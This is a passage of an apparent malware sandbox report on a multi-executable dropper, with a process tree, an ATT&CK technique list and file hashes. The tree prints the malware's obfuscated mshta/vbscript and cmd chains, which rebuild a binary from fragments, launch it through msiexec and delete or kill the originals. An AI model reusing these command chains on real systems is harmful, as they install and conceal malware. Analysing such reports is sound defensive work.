                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                PID:5076
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 5076 -s 2008
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:5756
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01c0e0d4fbb2ea73.exe
                                                                                                                                                                                                                                                                                            Sat01c0e0d4fbb2ea73.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:1728
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0314619575.exe"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:4688
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0314619575.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\0314619575.exe"
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  PID:1644
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Sat01c0e0d4fbb2ea73.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01c0e0d4fbb2ea73.exe" & exit
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:6380
                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:6328
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                      taskkill /im "Sat01c0e0d4fbb2ea73.exe" /f
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                      PID:4776
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat018ad0a25a7faa.exe
                                                                                                                                                                                                                                                                                                  Sat018ad0a25a7faa.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  PID:1232
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-946DI.tmp\Sat018ad0a25a7faa.tmp
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-946DI.tmp\Sat018ad0a25a7faa.tmp" /SL5="$70054,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat018ad0a25a7faa.exe"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:1852
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat018ad0a25a7faa.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat018ad0a25a7faa.exe" /SILENT
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        PID:2644
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-QK9QL.tmp\Sat018ad0a25a7faa.tmp
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-QK9QL.tmp\Sat018ad0a25a7faa.tmp" /SL5="$501E8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat018ad0a25a7faa.exe" /SILENT
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                          PID:2436
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-02S49.tmp\postback.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-02S49.tmp\postback.exe" ss1
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:4492
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01c5002407.exe
                                                                                                                                                                                                                                                                                                    Sat01c5002407.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                    PID:2896
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\4185635.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\4185635.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:4292
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\8524212.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\8524212.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:4240
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\8310630.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\8310630.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                      PID:4428
                                                                                                                                                                                                                                                                                                    • C:\ProgramData\3972052.exe
                                                                                                                                                                                                                                                                                                      "C:\ProgramData\3972052.exe"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:4600
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ( "C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\ProgramData\3972052.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If """" == """" for %d in ( ""C:\ProgramData\3972052.exe"") do taskkill /im ""%~nXd"" -F " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:5024
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\ProgramData\3972052.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If "" == "" for %d in ( "C:\ProgramData\3972052.exe") do taskkill /im "%~nXd" -F
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:4612
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\zrvA.exe
                                                                                                                                                                                                                                                                                                                  zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:1164
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ( "C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If ""/PqtlfVLLUzTsVT2Ot9MwAu "" == """" for %d in ( ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"") do taskkill /im ""%~nXd"" -F " , 0 , TrUe ) )
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:5144
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Local\Temp\zrvA.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu & If "/PqtlfVLLUzTsVT2Ot9MwAu " == "" for %d in ( "C:\Users\Admin\AppData\Local\Temp\zrvA.exe") do taskkill /im "%~nXd" -F
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                            PID:5324
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vBscriPt: closE ( cREATEObject( "WsCript.Shell" ). RuN ( "C:\Windows\system32\cmd.exe /c EChO | set /P = ""MZ"" > BXCX3.r & COPY /B /y BXCX3.R+ j5IuH.B + 1QL5Dt.T + CPR97qq.W8m + JuDE.JgD _gHPacAe.0 &stArt msiexec.exe /Y .\_GHPacae.0 " , 0 , tRue ) )
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:5620
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c EChO | set /P = "MZ" > BXCX3.r & COPY /B /y BXCX3.R+ j5IuH.B + 1QL5Dt.T + CPR97qq.W8m + JuDE.JgD _gHPacAe.0&stArt msiexec.exe /Y .\_GHPacae.0
                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                PID:6132
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                                                    PID:5520
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>BXCX3.r"
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                      PID:3860
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                      msiexec.exe /Y .\_GHPacae.0
                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      PID:4880
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                taskkill /im "3972052.exe" -F
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                PID:4688
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01688f54435b6.exe
                                                                                                                                                                                                                                                                                                                        Sat01688f54435b6.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:2560
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:4772
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                                                                                                                                                                            ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:1860
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:5292
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:3788
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:4132
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:4648
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:3872
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:1112
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                            PID:2940
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                      taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                      PID:4392
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                    PID:5052
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:4808
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                    PID:1192
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                                                                      PID:5392
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:6304
                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                      PID:5848
                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5848 CREDAT:82945 /prefetch:2
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                        PID:6584

                                                                                                                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Command-Line Interface

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1059

                                                                                                                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                                                                                                                    Modify Existing Service

                                                                                                                                                                                                                                                                                                                                    2
                                                                                                                                                                                                                                                                                                                                    T1031

                                                                                                                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                                                                                                                    Scheduled Task

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                                                                                                                    Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                                                                                                                    T1089

                                                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                                                                                                                    8
                                                                                                                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                                                                                                                    Process Discovery

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1057

                                                                                                                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                                                                                                                    Email Collection

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1114

                                                                                                                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                                                                                                                    • C:\ProgramData\8524212.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      0bc1bccb1afd14582a01ea108b78dc2e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a6c1673f1e53d0717bad4725a0a5aaa1c115972a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      756db848aa7d071ee74c09247cefaa838c6086562efe3562001216578a372811

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      dbcf2bbb8e7ba56558d3fd4780b0d76057686135e07e0e0b273a69453beac24d2177b397dfd0416e84a4bf88d57b85303f469ea7ec6b25ad3319057a03d52064

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      855f788798291249ca8fab82dda79362

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      61cc64e034515ca73ab96dcbb681b4ec7922da52

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      7bd05af4d9e41c3dcb4b48acb8d9d1af2b625f7b7d3a8b27b10142c884a4e465

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      838d32534970182c6bac3560307d5f540bc1af0dbe7880977cdafe94d60805c8428c8e3fe9979f0bb0799b71ea359ba0b53c9ea2da3eb87c62f5270eeb69210e

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      855f788798291249ca8fab82dda79362

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      61cc64e034515ca73ab96dcbb681b4ec7922da52

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      7bd05af4d9e41c3dcb4b48acb8d9d1af2b625f7b7d3a8b27b10142c884a4e465

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      838d32534970182c6bac3560307d5f540bc1af0dbe7880977cdafe94d60805c8428c8e3fe9979f0bb0799b71ea359ba0b53c9ea2da3eb87c62f5270eeb69210e

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat0119f3e03c741b02f.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      39144d45b2d358cecb01f10c6c2137b6

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      7b9e9bdd76a7784e6cb6a413bb9e67f577610536

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      71e7ab1590dd88309d03363fb9da83deae9f0f36306df64b4239d182131d9736

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e5c50ee84fcf17925cf8ad59869c7732f7215007313f6ee3d71f2a42e9b5f0fd680b242c7457b21a7cd612295e6b55da76cbcc4876902cd7fd93fef31d729b3b

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat0119f3e03c741b02f.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      39144d45b2d358cecb01f10c6c2137b6

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      7b9e9bdd76a7784e6cb6a413bb9e67f577610536

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      71e7ab1590dd88309d03363fb9da83deae9f0f36306df64b4239d182131d9736

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e5c50ee84fcf17925cf8ad59869c7732f7215007313f6ee3d71f2a42e9b5f0fd680b242c7457b21a7cd612295e6b55da76cbcc4876902cd7fd93fef31d729b3b

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01519886887.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      831bbabfcd2487c10c13fbdd6ab35641

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      ec05c8dd0ffb1aae26557a47a0ab552f966fcadf

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      e245603d93bc6a65e4ffe1a4ce8f9c0a9d500fa2fc0ceea85de8216a0b4b140d

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      b663cf3cdcb2d15c99f2a51888ab9e58d47da84d3bcd123ff3ceef63dc041574f7210008424a3add751c86cf506c666ac744f47966c82a62baee97e4def07b49

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80C751F5\Sat01519886887.exe
                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      831bbabfcd2487c10c13fbdd6ab35641

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      ec05c8dd0ffb1aae26557a47a0ab552f966fcadf

